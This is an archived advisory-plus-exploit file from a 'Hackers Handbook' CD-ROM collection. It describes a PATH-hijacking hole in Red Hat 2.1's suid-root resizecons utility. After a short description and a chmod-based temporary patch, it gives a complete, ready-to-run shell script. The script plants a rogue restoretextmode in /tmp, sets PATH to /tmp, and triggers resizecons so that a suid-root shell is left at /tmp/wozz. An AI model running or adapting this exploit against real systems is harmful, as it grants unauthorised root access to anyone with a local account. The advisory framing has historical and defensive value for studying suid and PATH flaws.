home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / files / exploits / resizecons.sh < prev    next >
Encoding:
Text File  |  1998-10-15  |  2.5 KB  |  75 lines
  1.    There is a security hole in RedHat 2.1, which installs the program
  2. /usr/bin/resizecons suid root.  The resizecons program allows a user
  3. to change the videmode of the console.  During this process, it runs
  4. the program restoretextmode without an absolute pathname, assuming the
  5. correct version will be found in the path, while running with root
  6. privileges.  It then executes setfont in the same manner.  By setting
  7. the path to find a rogue restoretextmode, a user can execute an arbitrary
  8. program as root.
  9.    As a more amusing aside, the file /tmp/selection.pid is read and the
  10. pid contained within is sent a SIGWINCH, allowing a user on the system
  11. to force a redraw of the screen to an arbitrary process (that handles 
  12. SIGWINCH calls) on the machine. 
  13.    If /usr/bin/resizecons needs to be run by users other than root at the
  14. console, provisions need to be made in the code to execute the outside
  15. utilities with absolute pathnames, and to check access rights on files
  16. before opening.
  17.  
  18.                    Program: /usr/bin/resizecons
  19. Affected Operating Systems: Red Hat 2.1 linux distribution
  20.               Requirements: account on system
  21.            Temporary Patch: chmod -s /usr/bin/resizecons
  22.        Security Compromise: root
  23.                     Author: Dave M. (davem@cmu.edu)
  24.                   Synopsis: resizecons runs restoretextmode without an
  25.                             absolute pathname while executing as root,
  26.                             allowing a user to substitute the real
  27.                             program with arbitrary commands.
  28.  
  29. Exploit:
  30.  
  31. wozzeck.sh:
  32. #!/bin/sh
  33. #
  34. # wozzeck.sh
  35. # exploits a security hole in /usr/bin/resizecons 
  36. # to create a suid root shell in /tmp/wozz on a 
  37. # linux Red Hat 2.1 system.
  38. #
  39. # by Dave M. (davem@cmu.edu)
  41. echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
  42. echo ================ Checking system vulnerability
  43. if test -u /usr/bin/resizecons
  44. then
  45. echo ++++++++++++++++ System appears vulnerable.
  46. cd /tmp
  47. cat << _EOF_ > /tmp/313x37
  48. This exploit is dedicated to 
  49. Wozz.  Use it with care.
  50. _EOF_
  51. cat << _EOF_ > /tmp/restoretextmode
  52. #!/bin/sh
  53. /bin/cp /bin/sh /tmp/wozz
  54. /bin/chmod 4777 /tmp/wozz
  55. _EOF_
  56. /bin/chmod +x /tmp/restoretextmode
  57. PATH=/tmp
  58. echo ================ Executing resizecons
  59. /usr/bin/resizecons 313x37
  60. /bin/rm /tmp/restoretextmode
  61. /bin/rm /tmp/313x37
  62. if test -u /tmp/wozz
  63. then
  64. echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
  65. else
  66. echo ---------------- Exploit failed
  67. fi
  68. else
  69. echo ---------------- This machine does not appear to be vulnerable.
  70. fi
  71.  
  72.  
  73.  
  74.  
  75.